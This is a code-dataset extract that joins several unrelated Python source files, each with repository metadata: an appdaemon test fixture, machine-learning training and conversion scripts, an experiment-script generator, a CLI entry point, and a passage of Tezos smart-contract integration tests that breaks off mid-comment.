__all__ = tuple(sorted(__protobuf__.manifest))
| true | true |
f7103fc1085344a33c3da77ee0da97ece10a9e77 | 1,420 | py | Python | tests/conftest.py | xaviml/z2m_ikea_controller | e612af5a913e8b4784dcaa23ea5319115427d083 | [
"MIT"
] | 19 | 2019-11-21T19:51:40.000Z | 2020-01-14T09:24:33.000Z | tests/conftest.py | xaviml/z2m_ikea_controller | e612af5a913e8b4784dcaa23ea5319115427d083 | [
"MIT"
] | 11 | 2019-11-20T16:43:35.000Z | 2020-01-17T16:23:06.000Z | tests/conftest.py | xaviml/z2m_ikea_controller | e612af5a913e8b4784dcaa23ea5319115427d083 | [
"MIT"
] | 5 | 2019-12-20T21:31:07.000Z | 2020-01-06T18:49:52.000Z | import asyncio
from asyncio import Task
from typing import Any, Callable
import appdaemon.plugins.hass.hassapi as hass
import appdaemon.plugins.mqtt.mqttapi as mqtt
import pytest
from cx_core import Controller
from pytest import MonkeyPatch
from tests.test_utils import fake_fn
async def fake_run_in(
self: Controller, fn: Callable[..., Any], delay: float, **kwargs: Any
) -> "Task[None]":
async def inner() -> None:
await asyncio.sleep(delay)
await fn(kwargs)
task = asyncio.create_task(inner())
return task
async def fake_cancel_timer(self: Controller, task: "Task[None]") -> bool:
return task.cancel()
@pytest.fixture(autouse=True)
def hass_mock(monkeypatch: MonkeyPatch) -> None:
"""
Fixture for set up the tests, mocking appdaemon functions
"""
monkeypatch.setattr(hass.Hass, "__init__", fake_fn())
monkeypatch.setattr(hass.Hass, "listen_event", fake_fn(async_=True))
monkeypatch.setattr(mqtt.Mqtt, "listen_event", fake_fn(async_=True))
monkeypatch.setattr(hass.Hass, "listen_state", fake_fn(async_=True))
monkeypatch.setattr(hass.Hass, "log", fake_fn())
monkeypatch.setattr(hass.Hass, "call_service", fake_fn(async_=True))
monkeypatch.setattr(hass.Hass, "get_ad_version", fake_fn(to_return="4.0.0"))
monkeypatch.setattr(hass.Hass, "run_in", fake_run_in)
monkeypatch.setattr(hass.Hass, "cancel_timer", fake_cancel_timer)
| 32.272727 | 80 | 0.728169 | import asyncio
from asyncio import Task
from typing import Any, Callable
import appdaemon.plugins.hass.hassapi as hass
import appdaemon.plugins.mqtt.mqttapi as mqtt
import pytest
from cx_core import Controller
from pytest import MonkeyPatch
from tests.test_utils import fake_fn
async def fake_run_in(
self: Controller, fn: Callable[..., Any], delay: float, **kwargs: Any
) -> "Task[None]":
async def inner() -> None:
await asyncio.sleep(delay)
await fn(kwargs)
task = asyncio.create_task(inner())
return task
async def fake_cancel_timer(self: Controller, task: "Task[None]") -> bool:
return task.cancel()
@pytest.fixture(autouse=True)
def hass_mock(monkeypatch: MonkeyPatch) -> None:
monkeypatch.setattr(hass.Hass, "__init__", fake_fn())
monkeypatch.setattr(hass.Hass, "listen_event", fake_fn(async_=True))
monkeypatch.setattr(mqtt.Mqtt, "listen_event", fake_fn(async_=True))
monkeypatch.setattr(hass.Hass, "listen_state", fake_fn(async_=True))
monkeypatch.setattr(hass.Hass, "log", fake_fn())
monkeypatch.setattr(hass.Hass, "call_service", fake_fn(async_=True))
monkeypatch.setattr(hass.Hass, "get_ad_version", fake_fn(to_return="4.0.0"))
monkeypatch.setattr(hass.Hass, "run_in", fake_run_in)
monkeypatch.setattr(hass.Hass, "cancel_timer", fake_cancel_timer)
| true | true |
f7104045e9f92729e7e05787170a633970a9e9c2 | 921 | py | Python | projects/Task019_ADAM/submission/scripts/convert.py | joeranbosma/nnDetection | 2ebbf1cdc8a8794c73e325f06fea50632c78ae8c | [
"BSD-3-Clause"
] | 242 | 2021-05-17T12:31:39.000Z | 2022-03-31T11:51:29.000Z | projects/Task019_ADAM/submission/scripts/convert.py | joeranbosma/nnDetection | 2ebbf1cdc8a8794c73e325f06fea50632c78ae8c | [
"BSD-3-Clause"
] | 59 | 2021-06-02T07:32:10.000Z | 2022-03-31T18:45:52.000Z | projects/Task019_ADAM/submission/scripts/convert.py | joeranbosma/nnDetection | 2ebbf1cdc8a8794c73e325f06fea50632c78ae8c | [
"BSD-3-Clause"
] | 38 | 2021-05-31T14:01:37.000Z | 2022-03-21T08:24:40.000Z | import argparse
from pathlib import Path
from nndet.io import load_pickle
from nndet.core.boxes.ops_np import box_center_np
THRESHOLD = 0.5
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('source', type=Path)
args = parser.parse_args()
source = args.source
predictions = load_pickle(source / "case_boxes.pkl")
boxes = predictions["pred_boxes"]
scores = predictions["pred_scores"]
keep = scores > THRESHOLD
boxes = boxes[keep]
if boxes.size > 0:
centers = box_center_np(boxes)
else:
centers = []
with open(source / "result.txt", "a") as f:
if len(centers) > 0:
for c in centers[:-1]:
f.write(f"{round(float(c[2]))}, {round(float(c[1]))}, {round(float(c[0]))}\n")
c = centers[-1]
f.write(f"{round(float(c[2]))}, {round(float(c[1]))}, {round(float(c[0]))}")
| 27.088235 | 94 | 0.604777 | import argparse
from pathlib import Path
from nndet.io import load_pickle
from nndet.core.boxes.ops_np import box_center_np
THRESHOLD = 0.5
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('source', type=Path)
args = parser.parse_args()
source = args.source
predictions = load_pickle(source / "case_boxes.pkl")
boxes = predictions["pred_boxes"]
scores = predictions["pred_scores"]
keep = scores > THRESHOLD
boxes = boxes[keep]
if boxes.size > 0:
centers = box_center_np(boxes)
else:
centers = []
with open(source / "result.txt", "a") as f:
if len(centers) > 0:
for c in centers[:-1]:
f.write(f"{round(float(c[2]))}, {round(float(c[1]))}, {round(float(c[0]))}\n")
c = centers[-1]
f.write(f"{round(float(c[2]))}, {round(float(c[1]))}, {round(float(c[0]))}")
| true | true |
f710422e65197ad6adf1832fd2c1d64dfa3c8bbc | 5,612 | py | Python | trainval.py | DoranLyong/DeepFish | 3ea3e13653f708d4a8dcb54b990dcc2997edf4e9 | [
"MIT"
] | 1 | 2020-12-14T21:30:19.000Z | 2020-12-14T21:30:19.000Z | trainval.py | DoranLyong/DeepFish | 3ea3e13653f708d4a8dcb54b990dcc2997edf4e9 | [
"MIT"
] | null | null | null | trainval.py | DoranLyong/DeepFish | 3ea3e13653f708d4a8dcb54b990dcc2997edf4e9 | [
"MIT"
] | null | null | null | import torch
import numpy as np
import argparse
import pandas as pd
import sys
import os
from torch import nn
from torch.nn import functional as F
import tqdm
import pprint
from src import utils as ut
import torchvision
from haven import haven_utils as hu
from haven import haven_chk as hc
from src import datasets, models
from torch.utils.data import DataLoader
import exp_configs
from torch.utils.data.sampler import RandomSampler
from src import wrappers
def trainval(exp_dict, savedir_base, reset, metrics_flag=True, datadir=None, cuda=False):
# bookkeeping
# ---------------
# get experiment directory
exp_id = hu.hash_dict(exp_dict)
savedir = os.path.join(savedir_base, exp_id)
if reset:
# delete and backup experiment
hc.delete_experiment(savedir, backup_flag=True)
# create folder and save the experiment dictionary
os.makedirs(savedir, exist_ok=True)
hu.save_json(os.path.join(savedir, 'exp_dict.json'), exp_dict)
print(pprint.pprint(exp_dict))
print('Experiment saved in %s' % savedir)
# set seed
# ==================
seed = 42
np.random.seed(seed)
torch.manual_seed(seed)
if cuda:
device = 'cuda'
torch.cuda.manual_seed_all(seed)
assert torch.cuda.is_available(), 'cuda is not, available please run with "-c 0"'
else:
device = 'cpu'
print('Running on device: %s' % device)
# Dataset
# Load val set and train set
val_set = datasets.get_dataset(dataset_name=exp_dict["dataset"], split="val",
transform=exp_dict.get("transform"),
datadir=datadir)
train_set = datasets.get_dataset(dataset_name=exp_dict["dataset"],
split="train",
transform=exp_dict.get("transform"),
datadir=datadir)
# Load train loader, val loader, and vis loader
train_loader = DataLoader(train_set,
sampler=RandomSampler(train_set,
replacement=True, num_samples=max(min(500,
len(train_set)),
len(val_set))),
batch_size=exp_dict["batch_size"])
val_loader = DataLoader(val_set, shuffle=False, batch_size=exp_dict["batch_size"])
vis_loader = DataLoader(val_set, sampler=ut.SubsetSampler(train_set,
indices=[0, 1, 2]),
batch_size=1)
# Create model, opt, wrapper
model_original = models.get_model(exp_dict["model"], exp_dict=exp_dict).cuda()
opt = torch.optim.Adam(model_original.parameters(),
lr=1e-5, weight_decay=0.0005)
model = wrappers.get_wrapper(exp_dict["wrapper"], model=model_original, opt=opt).cuda()
score_list = []
# Checkpointing
# =============
score_list_path = os.path.join(savedir, "score_list.pkl")
model_path = os.path.join(savedir, "model_state_dict.pth")
opt_path = os.path.join(savedir, "opt_state_dict.pth")
if os.path.exists(score_list_path):
# resume experiment
score_list = ut.load_pkl(score_list_path)
model.load_state_dict(torch.load(model_path))
opt.load_state_dict(torch.load(opt_path))
s_epoch = score_list[-1]["epoch"] + 1
else:
# restart experiment
score_list = []
s_epoch = 0
# Run training and validation
for epoch in range(s_epoch, exp_dict["max_epoch"]):
score_dict = {"epoch": epoch}
# visualize
# model.vis_on_loader(vis_loader, savedir=os.path.join(savedir, "images"))
# validate
score_dict.update(model.val_on_loader(val_loader))
# train
score_dict.update(model.train_on_loader(train_loader))
# Add score_dict to score_list
score_list += [score_dict]
# Report and save
print(pd.DataFrame(score_list).tail())
hu.save_pkl(score_list_path, score_list)
hu.torch_save(model_path, model.state_dict())
hu.torch_save(opt_path, opt.state_dict())
print("Saved in %s" % savedir)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-e', '--exp_group_list', nargs='+')
parser.add_argument('-sb', '--savedir_base', required=True)
parser.add_argument('-d', '--datadir', required=True)
parser.add_argument('-r', '--reset', default=0, type=int)
parser.add_argument('-ei', '--exp_id', default=None)
parser.add_argument('-c', '--cuda', type=int, default=1)
args = parser.parse_args()
# Collect experiments
# -------------------
if args.exp_id is not None:
# select one experiment
savedir = os.path.join(args.savedir_base, args.exp_id)
exp_dict = hu.load_json(os.path.join(savedir, 'exp_dict.json'))
exp_list = [exp_dict]
else:
# select exp group
exp_list = []
for exp_group_name in args.exp_group_list:
exp_list += exp_configs.EXP_GROUPS[exp_group_name]
####
# Run experiments or View them
# ----------------------------
# run experiments
for exp_dict in exp_list:
# do trainval
trainval(exp_dict=exp_dict,
savedir_base=args.savedir_base,
reset=args.reset,
datadir=args.datadir,
cuda=args.cuda)
| 32.818713 | 91 | 0.596044 | import torch
import numpy as np
import argparse
import pandas as pd
import sys
import os
from torch import nn
from torch.nn import functional as F
import tqdm
import pprint
from src import utils as ut
import torchvision
from haven import haven_utils as hu
from haven import haven_chk as hc
from src import datasets, models
from torch.utils.data import DataLoader
import exp_configs
from torch.utils.data.sampler import RandomSampler
from src import wrappers
def trainval(exp_dict, savedir_base, reset, metrics_flag=True, datadir=None, cuda=False):
exp_id = hu.hash_dict(exp_dict)
savedir = os.path.join(savedir_base, exp_id)
if reset:
hc.delete_experiment(savedir, backup_flag=True)
os.makedirs(savedir, exist_ok=True)
hu.save_json(os.path.join(savedir, 'exp_dict.json'), exp_dict)
print(pprint.pprint(exp_dict))
print('Experiment saved in %s' % savedir)
seed = 42
np.random.seed(seed)
torch.manual_seed(seed)
if cuda:
device = 'cuda'
torch.cuda.manual_seed_all(seed)
assert torch.cuda.is_available(), 'cuda is not, available please run with "-c 0"'
else:
device = 'cpu'
print('Running on device: %s' % device)
val_set = datasets.get_dataset(dataset_name=exp_dict["dataset"], split="val",
transform=exp_dict.get("transform"),
datadir=datadir)
train_set = datasets.get_dataset(dataset_name=exp_dict["dataset"],
split="train",
transform=exp_dict.get("transform"),
datadir=datadir)
train_loader = DataLoader(train_set,
sampler=RandomSampler(train_set,
replacement=True, num_samples=max(min(500,
len(train_set)),
len(val_set))),
batch_size=exp_dict["batch_size"])
val_loader = DataLoader(val_set, shuffle=False, batch_size=exp_dict["batch_size"])
vis_loader = DataLoader(val_set, sampler=ut.SubsetSampler(train_set,
indices=[0, 1, 2]),
batch_size=1)
model_original = models.get_model(exp_dict["model"], exp_dict=exp_dict).cuda()
opt = torch.optim.Adam(model_original.parameters(),
lr=1e-5, weight_decay=0.0005)
model = wrappers.get_wrapper(exp_dict["wrapper"], model=model_original, opt=opt).cuda()
score_list = []
score_list_path = os.path.join(savedir, "score_list.pkl")
model_path = os.path.join(savedir, "model_state_dict.pth")
opt_path = os.path.join(savedir, "opt_state_dict.pth")
if os.path.exists(score_list_path):
score_list = ut.load_pkl(score_list_path)
model.load_state_dict(torch.load(model_path))
opt.load_state_dict(torch.load(opt_path))
s_epoch = score_list[-1]["epoch"] + 1
else:
score_list = []
s_epoch = 0
for epoch in range(s_epoch, exp_dict["max_epoch"]):
score_dict = {"epoch": epoch}
score_dict.update(model.val_on_loader(val_loader))
score_dict.update(model.train_on_loader(train_loader))
score_list += [score_dict]
print(pd.DataFrame(score_list).tail())
hu.save_pkl(score_list_path, score_list)
hu.torch_save(model_path, model.state_dict())
hu.torch_save(opt_path, opt.state_dict())
print("Saved in %s" % savedir)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-e', '--exp_group_list', nargs='+')
parser.add_argument('-sb', '--savedir_base', required=True)
parser.add_argument('-d', '--datadir', required=True)
parser.add_argument('-r', '--reset', default=0, type=int)
parser.add_argument('-ei', '--exp_id', default=None)
parser.add_argument('-c', '--cuda', type=int, default=1)
args = parser.parse_args()
if args.exp_id is not None:
savedir = os.path.join(args.savedir_base, args.exp_id)
exp_dict = hu.load_json(os.path.join(savedir, 'exp_dict.json'))
exp_list = [exp_dict]
else:
exp_list = []
for exp_group_name in args.exp_group_list:
exp_list += exp_configs.EXP_GROUPS[exp_group_name]
for exp_dict in exp_list:
trainval(exp_dict=exp_dict,
savedir_base=args.savedir_base,
reset=args.reset,
datadir=args.datadir,
cuda=args.cuda)
| true | true |
f71042b95d0705e8bfa06f237b0c7ba6890bd92a | 3,484 | py | Python | scripts/gen_ksim_outside_exp.py | ctring/konex | 7bf55f68f9ddcba6e2007e9c8049899cdb707d69 | [
"MIT"
] | null | null | null | scripts/gen_ksim_outside_exp.py | ctring/konex | 7bf55f68f9ddcba6e2007e9c8049899cdb707d69 | [
"MIT"
] | null | null | null | scripts/gen_ksim_outside_exp.py | ctring/konex | 7bf55f68f9ddcba6e2007e9c8049899cdb707d69 | [
"MIT"
] | null | null | null | #!/usr/bin/python
'''
Generate a command file for automated kSim experiment with out-of-dataset queries
Example:
./gen_ksim_outside_exp.py 10 10 dataset.txt 0.3 experiment.txt results.txt -k 1 3 5 7 -m 7 --seed 23 -n 10
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import random
def pick_random(count, length, min_length=2, n=10):
picked = []
for i in range(n):
idx = random.randint(0, count - 1)
start = random.randint(0, length - min_length)
end = start + random.randint(min_length, length - start)
picked.append((idx, start, end))
return picked
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Picks random time series given the '
'dimension of a dataset.')
parser.add_argument('count', type=int, help='number of items in the query set.')
parser.add_argument('length', type=int, help='length of each item in the dataset.')
parser.add_argument('ds_path', help='path to the dataset used in the experiment')
parser.add_argument('q_path', help='path to the query file used in the experiment')
parser.add_argument('st', type=float, help='similarity threshold for the experiment')
parser.add_argument('exp_path', help='path to the K-ONEX experiment script')
parser.add_argument('exp_result_path', help='path for the result file')
parser.add_argument('-k', nargs='+',
help='number of similar time series to look for.'
'Multiple values can be specified (separated by space).')
parser.add_argument('-m', help='maximum number of multiple of h '
'(number of time series to be examined).')
parser.add_argument('-n', type=int, default=10,
help='number of sequences to be picked (default: 10).')
parser.add_argument('--paa', type=int, nargs='+',
help='block sizes for PAA.')
parser.add_argument('--seed', type=int,
help='seed for the random number generator.')
parser.add_argument('--min-length', type=int, default=10,
help='minimum length of each sequence (default: 10).')
parser.add_argument('--fmt', default='{0} [{1}, {2}]',
help='python format for output (default: {0} [{1}, {2}])')
args = parser.parse_args()
random.seed(args.seed)
seq = pick_random(args.count, args.length, args.min_length, args.n)
for s in seq:
print(args.fmt.format(s[0], s[1], s[2]))
print()
with open(args.exp_path, 'w') as f:
print('load {}'.format(args.ds_path), file=f)
print('load {}'.format(args.q_path), file=f)
group_file = '%s_GROUPS_%.1f' % (args.ds_path, args.st)
if os.path.exists(group_file):
print('loadGroup 0 {}'.format(group_file), file=f)
else:
print('group 0 {}'.format(args.st), file=f)
print('saveGroup 0 {}'.format(group_file), file=f)
print('testSim {}'.format(args.exp_result_path), file=f)
for b in args.paa:
for k in args.k:
for s in seq:
print('testSim {} {} {} 0 1 {} {} {}'.format(k, args.m, b, s[0], s[1], s[2]),
file=f)
print('Experiment script is generated at {}'.format(args.exp_path))
| 43.55 | 110 | 0.602755 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import random
def pick_random(count, length, min_length=2, n=10):
picked = []
for i in range(n):
idx = random.randint(0, count - 1)
start = random.randint(0, length - min_length)
end = start + random.randint(min_length, length - start)
picked.append((idx, start, end))
return picked
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Picks random time series given the '
'dimension of a dataset.')
parser.add_argument('count', type=int, help='number of items in the query set.')
parser.add_argument('length', type=int, help='length of each item in the dataset.')
parser.add_argument('ds_path', help='path to the dataset used in the experiment')
parser.add_argument('q_path', help='path to the query file used in the experiment')
parser.add_argument('st', type=float, help='similarity threshold for the experiment')
parser.add_argument('exp_path', help='path to the K-ONEX experiment script')
parser.add_argument('exp_result_path', help='path for the result file')
parser.add_argument('-k', nargs='+',
help='number of similar time series to look for.'
'Multiple values can be specified (separated by space).')
parser.add_argument('-m', help='maximum number of multiple of h '
'(number of time series to be examined).')
parser.add_argument('-n', type=int, default=10,
help='number of sequences to be picked (default: 10).')
parser.add_argument('--paa', type=int, nargs='+',
help='block sizes for PAA.')
parser.add_argument('--seed', type=int,
help='seed for the random number generator.')
parser.add_argument('--min-length', type=int, default=10,
help='minimum length of each sequence (default: 10).')
parser.add_argument('--fmt', default='{0} [{1}, {2}]',
help='python format for output (default: {0} [{1}, {2}])')
args = parser.parse_args()
random.seed(args.seed)
seq = pick_random(args.count, args.length, args.min_length, args.n)
for s in seq:
print(args.fmt.format(s[0], s[1], s[2]))
print()
with open(args.exp_path, 'w') as f:
print('load {}'.format(args.ds_path), file=f)
print('load {}'.format(args.q_path), file=f)
group_file = '%s_GROUPS_%.1f' % (args.ds_path, args.st)
if os.path.exists(group_file):
print('loadGroup 0 {}'.format(group_file), file=f)
else:
print('group 0 {}'.format(args.st), file=f)
print('saveGroup 0 {}'.format(group_file), file=f)
print('testSim {}'.format(args.exp_result_path), file=f)
for b in args.paa:
for k in args.k:
for s in seq:
print('testSim {} {} {} 0 1 {} {} {}'.format(k, args.m, b, s[0], s[1], s[2]),
file=f)
print('Experiment script is generated at {}'.format(args.exp_path))
| true | true |
f71042eebecd3985f43d5e37331634edf3eff6ca | 407 | py | Python | pmfp/__main__.py | Python-Tools/pmfp | 832273890eec08e84f9c68d03f3316b2c8139133 | [
"MIT"
] | 4 | 2017-09-15T03:38:56.000Z | 2019-12-16T02:03:14.000Z | pmfp/__main__.py | Python-Tools/pmfp | 832273890eec08e84f9c68d03f3316b2c8139133 | [
"MIT"
] | 1 | 2021-04-27T10:51:42.000Z | 2021-04-27T10:51:42.000Z | pmfp/__main__.py | Python-Tools/pmfp | 832273890eec08e84f9c68d03f3316b2c8139133 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""PMFP.
一个项目管理脚手架.
"""
import warnings
from .entrypoint import ppm
import sys
from typing import List
from pmfp.entrypoint import ppm
from colorama import init
init()
def main(argv: List[str] = sys.argv[1:]) -> None:
"""服务启动入口.
设置覆盖顺序`环境变量>命令行参数`>`'-c'指定的配置文件`>`项目启动位置的配置文件`>默认配置.
"""
ppm(argv)
return None
if __name__ == "__main__":
main(sys.argv[1:])
| 15.074074 | 56 | 0.658477 |
import warnings
from .entrypoint import ppm
import sys
from typing import List
from pmfp.entrypoint import ppm
from colorama import init
init()
def main(argv: List[str] = sys.argv[1:]) -> None:
ppm(argv)
return None
if __name__ == "__main__":
main(sys.argv[1:])
| true | true |
f710440ca35c421c0923057216c8cf72bdf47d8b | 57,471 | py | Python | tests_python/tests_009/test_contract.py | ulrikstrid/tezos | 96d4653ba4fb48eccdd0ca309c98254c39396712 | [
"MIT"
] | null | null | null | tests_python/tests_009/test_contract.py | ulrikstrid/tezos | 96d4653ba4fb48eccdd0ca309c98254c39396712 | [
"MIT"
] | null | null | null | tests_python/tests_009/test_contract.py | ulrikstrid/tezos | 96d4653ba4fb48eccdd0ca309c98254c39396712 | [
"MIT"
] | null | null | null | import os
import re
import json
import itertools
from typing import List, Union, Any
import pytest
from client.client import Client
from tools import utils
from tools.constants import IDENTITIES
from .contract_paths import (
CONTRACT_PATH,
ILLTYPED_CONTRACT_PATH,
all_contracts,
all_legacy_contracts,
)
def file_basename(path):
return os.path.splitext(os.path.basename(path))[0]
# Generic piece of code to originate a contract
def originate(
client,
session,
contract,
init_storage,
amount,
contract_name=None,
sender='bootstrap1',
baker='bootstrap5',
arguments=None,
):
if contract_name is None:
contract_name = file_basename(contract)
args = ['--init', init_storage, '--burn-cap', '10.0']
if arguments is not None:
args += arguments
origination = client.originate(
contract_name, amount, sender, contract, args
)
session['contract'] = origination.contract
print(origination.contract)
utils.bake(client, baker)
assert utils.check_block_contains_operations(
client, [origination.operation_hash]
)
return origination
@pytest.mark.contract
@pytest.mark.incremental
class TestManager:
def test_manager_origination(self, client: Client, session: dict):
path = os.path.join(CONTRACT_PATH, 'entrypoints', 'manager.tz')
pubkey = IDENTITIES['bootstrap2']['identity']
originate(client, session, path, f'"{pubkey}"', 1000)
originate(
client, session, path, f'"{pubkey}"', 1000, contract_name="manager2"
)
def test_delegatable_origination(self, client: Client, session: dict):
path = os.path.join(
CONTRACT_PATH, 'entrypoints', 'delegatable_target.tz'
)
pubkey = IDENTITIES['bootstrap2']['identity']
originate(
client, session, path, f'Pair "{pubkey}" (Pair "hello" 45)', 1000
)
def test_target_with_entrypoints_origination(self, client: Client, session):
path = os.path.join(
CONTRACT_PATH, 'entrypoints', 'big_map_entrypoints.tz'
)
originate(
client, session, path, 'Pair {} {}', 1000, contract_name='target'
)
def test_target_without_entrypoints_origination(
self, client: Client, session
):
path = os.path.join(
CONTRACT_PATH, 'entrypoints', 'no_entrypoint_target.tz'
)
originate(
client,
session,
path,
'Pair "hello" 42',
1000,
contract_name='target_no_entrypoints',
)
def test_target_without_default_origination(self, client: Client, session):
path = os.path.join(
CONTRACT_PATH, 'entrypoints', 'no_default_target.tz'
)
originate(
client,
session,
path,
'Pair "hello" 42',
1000,
contract_name='target_no_default',
)
def test_target_with_root_origination(self, client: Client, session):
path = os.path.join(CONTRACT_PATH, 'entrypoints', 'rooted_target.tz')
originate(
client,
session,
path,
'Pair "hello" 42',
1000,
contract_name='rooted_target',
)
def test_manager_set_delegate(self, client: Client):
client.set_delegate('manager', 'bootstrap2', [])
utils.bake(client, 'bootstrap5')
bootstrap2_pkh = IDENTITIES['bootstrap2']['identity']
client.set_delegate('delegatable_target', bootstrap2_pkh, [])
utils.bake(client, 'bootstrap5')
delegate = IDENTITIES['bootstrap2']['identity']
assert client.get_delegate('manager', []).delegate == delegate
assert (
client.get_delegate('delegatable_target', []).delegate == delegate
)
client.set_delegate('manager', 'bootstrap3', [])
utils.bake(client, 'bootstrap5')
client.set_delegate('delegatable_target', 'bootstrap3', [])
utils.bake(client, 'bootstrap5')
delegate = IDENTITIES['bootstrap3']['identity']
assert client.get_delegate('manager', []).delegate == delegate
assert (
client.get_delegate('delegatable_target', []).delegate == delegate
)
def test_manager_withdraw_delegate(self, client: Client):
client.withdraw_delegate('manager', [])
utils.bake(client, 'bootstrap5')
client.withdraw_delegate('delegatable_target', [])
utils.bake(client, 'bootstrap5')
assert client.get_delegate('manager', []).delegate is None
assert client.get_delegate('delegatable_target', []).delegate is None
def test_transfer_to_manager(self, client: Client):
balance = client.get_mutez_balance('manager')
balance_bootstrap = client.get_mutez_balance('bootstrap2')
amount = 10.001
amount_mutez = utils.mutez_of_tez(amount)
client.transfer(
amount,
'bootstrap2',
'manager',
['--gas-limit', f'{128 * 15450 + 108}'],
)
utils.bake(client, 'bootstrap5')
new_balance = client.get_mutez_balance('manager')
new_balance_bootstrap = client.get_mutez_balance('bootstrap2')
fee = 0.000548
fee_mutez = utils.mutez_of_tez(fee)
assert balance + amount_mutez == new_balance
assert (
balance_bootstrap - fee_mutez - amount_mutez
== new_balance_bootstrap
)
def test_simple_transfer_from_manager_to_implicit(self, client: Client):
balance = client.get_mutez_balance('manager')
balance_bootstrap = client.get_mutez_balance('bootstrap2')
amount = 10.1
amount_mutez = utils.mutez_of_tez(amount)
client.transfer(
amount,
'manager',
'bootstrap2',
['--gas-limit', f'{128 * 26350 + 12}'],
)
utils.bake(client, 'bootstrap5')
new_balance = client.get_mutez_balance('manager')
new_balance_bootstrap = client.get_mutez_balance('bootstrap2')
fee = 0.000794
fee_mutez = utils.mutez_of_tez(fee)
assert balance - amount_mutez == new_balance
assert (
balance_bootstrap + amount_mutez - fee_mutez
== new_balance_bootstrap
)
def test_transfer_from_manager_to_manager(self, client: Client):
balance = client.get_mutez_balance('manager')
balance_dest = client.get_mutez_balance('manager2')
balance_bootstrap = client.get_mutez_balance('bootstrap2')
amount = 10
amount_mutez = utils.mutez_of_tez(amount)
client.transfer(
amount,
'manager',
'manager2',
['--gas-limit', f'{128 * 44950 + 112}'],
)
utils.bake(client, 'bootstrap5')
new_balance = client.get_mutez_balance('manager')
new_balance_dest = client.get_mutez_balance('manager2')
new_balance_bootstrap = client.get_mutez_balance('bootstrap2')
fee = 0.001124
fee_mutez = utils.mutez_of_tez(fee)
assert balance_bootstrap - fee_mutez == new_balance_bootstrap
assert balance - amount_mutez == new_balance
assert balance_dest + amount_mutez == new_balance_dest
def test_transfer_from_manager_to_default(self, client: Client):
client.transfer(
10, 'manager', 'bootstrap2', ['--entrypoint', 'default']
)
utils.bake(client, 'bootstrap5')
client.transfer(10, 'manager', 'manager', ['--entrypoint', 'default'])
utils.bake(client, 'bootstrap5')
def test_transfer_from_manager_to_target(self, client: Client):
client.transfer(10, 'manager', 'target', ['--burn-cap', '0.356'])
utils.bake(client, 'bootstrap5')
def test_transfer_from_manager_to_entrypoint_with_args(
self, client: Client
):
arg = 'Pair "hello" 42'
# using 'transfer'
client.transfer(
0,
'manager',
'target',
['--entrypoint', 'add_left', '--arg', arg, '--burn-cap', '0.067'],
)
utils.bake(client, 'bootstrap5')
client.transfer(
0,
'manager',
'target',
['--entrypoint', 'mem_left', '--arg', '"hello"'],
)
utils.bake(client, 'bootstrap5')
# using 'call'
client.call(
'manager',
'target',
['--entrypoint', 'add_left', '--arg', arg, '--burn-cap', '0.067'],
)
utils.bake(client, 'bootstrap5')
client.call(
'manager',
'target',
['--entrypoint', 'mem_left', '--arg', '"hello"'],
)
utils.bake(client, 'bootstrap5')
def test_transfer_from_manager_no_entrypoint_with_args(
self, client: Client
):
arg = 'Left Unit'
client.transfer(0, 'manager', 'target_no_entrypoints', ['--arg', arg])
utils.bake(client, 'bootstrap5')
client.call('manager', 'target_no_entrypoints', ['--arg', arg])
utils.bake(client, 'bootstrap5')
def test_transfer_from_manager_to_no_default_with_args(
self, client: Client
):
arg = 'Left Unit'
client.transfer(0, 'manager', 'target_no_default', ['--arg', arg])
utils.bake(client, 'bootstrap5')
client.call('manager', 'target_no_default', ['--arg', arg])
utils.bake(client, 'bootstrap5')
def test_transfer_from_manager_to_rooted_target_with_args(
self, client: Client
):
arg = 'Left Unit'
client.transfer(
0,
'manager',
'rooted_target',
['--arg', arg, '--entrypoint', 'root'],
)
utils.bake(client, 'bootstrap5')
client.call(
'manager', 'rooted_target', ['--arg', arg, '--entrypoint', 'root']
)
utils.bake(client, 'bootstrap5')
def test_transfer_json_to_entrypoint_with_args(self, client):
balance = client.get_mutez_balance('manager')
balance_bootstrap = client.get_mutez_balance('bootstrap2')
fee = 0.0123
fee_mutez = utils.mutez_of_tez(fee)
json_obj = [
{
"destination": "target",
"amount": "0",
"fee": str(fee),
"gas-limit": "65942",
"storage-limit": "1024",
"arg": 'Pair "hello" 42',
"entrypoint": "add_left",
}
]
json_ops = json.dumps(json_obj, separators=(',', ':'))
client.run(client.cmd_batch('manager', json_ops))
utils.bake(client, 'bootstrap5')
new_balance = client.get_mutez_balance('manager')
new_balance_bootstrap = client.get_mutez_balance('bootstrap2')
assert balance == new_balance
assert balance_bootstrap - fee_mutez == new_balance_bootstrap
def test_multiple_transfers(self, client):
balance = client.get_mutez_balance('manager')
balance_bootstrap2 = client.get_mutez_balance('bootstrap2')
balance_bootstrap3 = client.get_mutez_balance('bootstrap3')
amount_2 = 10.1
amount_mutez_2 = utils.mutez_of_tez(amount_2)
amount_3 = 11.01
amount_mutez_3 = utils.mutez_of_tez(amount_3)
json_obj = [
{"destination": "bootstrap2", "amount": str(amount_2)},
{"destination": "bootstrap3", "amount": str(amount_3)},
]
json_ops = json.dumps(json_obj, separators=(',', ':'))
client.run(client.cmd_batch('manager', json_ops))
utils.bake(client, 'bootstrap5')
new_balance = client.get_mutez_balance('manager')
new_balance_bootstrap2 = client.get_mutez_balance('bootstrap2')
new_balance_bootstrap3 = client.get_mutez_balance('bootstrap3')
fee_mutez = 794 + 698
assert balance - amount_mutez_2 - amount_mutez_3 == new_balance
assert (
balance_bootstrap2 + amount_mutez_2 - fee_mutez
== new_balance_bootstrap2
)
assert balance_bootstrap3 + amount_mutez_3 == new_balance_bootstrap3
# This test to verifies contract execution order. There are 3
# contracts: Storer, Caller, and Appender. Storer appends its argument
# to storage. Caller calls the list of unit contracts in its
# storage. Appender calls the string contract in its storage with a
# stored argument.
#
# For each test, there is one unique Storer. Each test is
# parameterized by a tree and the expected final storage of the
# Storer. A leaf in the tree is a string. Inner nodes are lists of
# leafs/inner nodes. The test maps maps over this tree to build a
